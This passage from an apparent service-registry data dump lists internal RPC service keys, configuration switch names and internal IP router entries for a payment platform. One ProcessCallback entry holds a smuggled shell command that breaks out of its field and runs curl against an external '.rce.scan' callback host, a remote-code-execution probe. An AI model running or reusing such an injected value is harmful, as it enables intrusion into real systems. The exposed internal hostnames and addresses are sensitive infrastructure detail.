pay.echox.mirror.service.EchoxMirrorMockDataService:1.0:${echox_test}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.insmobile.communityShardDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.mordercenter.KouBeiVouchercoreService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.ApiSidecarOdpAppFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradeexprod.common.service.facade.FpPeerpayConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.biz.shared.running.LinkeCoverageManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databizcore.common.service.facade.security.SecurityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.EmailConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.superapi.common.core.service.OpenApiService:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opinioncore:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:AUTOTEST@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.account.CertificateInfoManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:createSpecialPaymentProcessHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_CATERING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.membercenter.service.facade.LogonIdManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:appxagg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.table.meta.TableMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.CertOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mservicesinspect.service.facade.service.DataSyncInspectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_10.15.235.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.selectcore.common.service.facade.api.SelectRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.failover.api.FailoverService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimVisitAppointmentAcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-compmng-bxs-consumer#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mwalletmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.client.api.BundleInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.facade.RefundSupportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IPAYMENT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradeexprod.common.service.facade.CreateDeductPayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmcreditcore.common.service.facade.ZmCreditScoreEvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sportsprod.common.service.facade.stat.GlobalStatGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.match.repository.impl.MatchProductHourDataStatModelRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.192.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbomp.common.service.facade.spi.RecruitInfoCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:ifcfeecharge_openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.shop.ShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingcore.common.service.facade.use.InsMktTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.122.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprodapicore.facade.manageapi.GrayPublishManager:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcenter.common.dal.mcenter.auto.daointerface.TradeRefundDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IMASPMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mobilegw:name=com.alipay.mobilegw.spi.config.invalidChars,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.AuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.bizservice.UniBizServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custstk.cachesync.spi.DataChangeMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.label.api.AILabelManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.cicada.facade.api.BrandWallManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcinstprod.common.service.facade.spi.robotdata.RobotDataCallbackService:1.0:bkinstportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchis_preSubmitMerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.combmng.common.service.facade.user.UserMemoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.updateRuleJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.181.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdarttool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.simulated.api.SatransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_CTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.pdcore.common.service.facade.LogManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.guabus.common.service.facade.api.common.ComAccountInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.drm71#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileacauth.service.device.facade.IotDeviceInfoWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_ZZZZZZZ#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.morderprod.common.service.facade.SignProcessQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.96.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.reservemng.service.facade.api.ReservecenterAllocateOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_IFCFLUXBATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.yeb.YebAftransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:OPENINSIGHT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pmscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.settlequery.BankCodeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.api.FreezeAccOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CLIVE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.inspect.service.InspectFailureMangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmobilemarket.common.service.facade.fintdop.ProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alifi.shared.component.lock.service.LockBSFacade:1.0:bkpromoguard-lockBSFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instfluxcore.common.service.facade.inst.order.InstAcceptanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.classPathBlackListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.eval.BdStaticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gftax.common.service.facade.TaxAccrueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.81.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.unifiedcredit.api.UctransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_ICFMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.adbasiclib.ad.rpc.AdService:1.0:adexchange-common@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pvsofaserver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.172.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.vehownerprod.facade.promo.VehPromoApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.65.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:autofinanceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcp_easy_member_merchant_settle_apply@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.mng.ThirdPartyAppWhiteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.fincommonbff.drm.Switches.showAllocationFund,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.180.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.merchantsettle.biz.service.test.SettleTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csinsight.core.engine.api.facade.ConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.integration.baoxiancore.PolicyServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.reviseExpireVouchers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.facade.confmng.BizTypeMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.igdmc.biz.service.LocalDataMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecPositionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.PublicResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.credible.UserCredibleMobileService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paylink.service.facade.ActivityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-0#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:kbopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zcache.log.charge.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbfeaturecenter.common.service.facade.FeatureExtractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.173.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgopen.common.service.facade.foi.FofService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@antassistant#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sofa.rpc.elastic.ElasticService:1.0:certdoccenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstmng.integration.instasset.InstAssetQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.custcenter.service.archive.facade.ArchiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.166.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bbcmng.common.service.facade.CqcPackageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.openapi.AntJobOpenApi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.linku.common.service.facade.user.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.pcardsales:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.api.JsAPISync2AbilityProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imerchprod.merchant.facade.api.StoreQueryService:1.0:imif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.clivecenter.common.service.facade.api.ConversationActorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.ufe.internal.facade.service.UfeRepoPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pfunddts.common.facade.api.ProblemProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instriskcenter.facade.api.RiskNotifyGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.247.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.common.auth.foundation.facade.AuthInfrastructureServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.finfundtrade.FundPurchaseFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.forum.api.admin.AdminManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayuarkbase.facade.MsgDispatchService:1.0:10@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.opscloud.MrmExecLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AccountGradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:gray@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mergepayprod.common.service.facade.mergeorder.api.MergeOrderFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskdataquality.common.service.facade.api.DataValidationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.testcenter.openapi.facade.ToolOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.lendpofprod.common.service.facade.ldc.proxy.LdcPayReceiptForwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.bizprod.common.service.facade.api.MerchantShopExternalBulkBindingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotbsp.business.facade.axconsumer.ConsumerLossOrderFacade:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.couponcoreAccessUri,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_INSTRTDECISION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliapy.boot.test.sofarpc.starter.demo.ConfigDemoService:1.0:service-filter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cfmng-antprocessCallBackFacadeUniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopAnalysisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";curl http://GIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZBZOM3WY6LBOA------.rce.scan.noble.dn5l0g.co;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.commservice.CommunicationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:pointOrderCompensateExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ICARDCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bkparamcore.facade.ParamInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpunish.facade.cicada.merchantHome.AppealFromMerchantHome:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpay.query.PcreditFreezeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alm.service.facade.facade.DictionaryViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agreementpay.common.service.payment.api.AgreementPayPCReceiveSmsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filecore.service.facade.api.FileAssembleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdop.common.service.facade.OpKaTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.spi.promo.InviteRelationFacade:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.134.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.girisk.common.service.facade.api.affiliated.AffiliatedPartyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.maxSliceCountPerTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pricemng.common.service.facade.api.task.PriceUpgradeTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.DispatchNotifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.ReservationQueryBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_ZHENGYUAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchopenai.ai.common.service.facade.api.IndustryCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.156.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.requiremng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.DiscountActivityQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.advancepayment.api.AptransOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.mrchcenter.FunctionsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.equity.search.admin.CampSearchAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.platform.AgdsPlatformCreditManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.core.service.innerclient.master.drm.MasterConfigDRM.productSyncStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.orderlink.OrderLinkMigrateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdswindspeed.facade.admin.AdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.item.ItemManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.amlgo.common.service.facade.zptest.ZproxyMRServiceFacade:1.0:zproxyMRForG@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:pfunddts@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.snsmessage.api.SnsMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.limitcenter.service.facade.limitcheck.api.LimitCheckService:1.0:limitCheckService-for-bridge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fiscore.common.service.facade.callback.DecideCallBackService:1.0:tradefront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:planetcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.inspect.detecttask.DetectTaskOrderManagerComponent:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:customerOrderCollectFlatTaskExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.WorkDiaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditagreement.common.service.component.launch.PcreditLaunchAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:adatabus@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.functionBlackCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.228.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchishub.common.service.facade.api.MessageMergeRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.benefit.AppBenefitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.ShopQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:abilitycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopengw.servic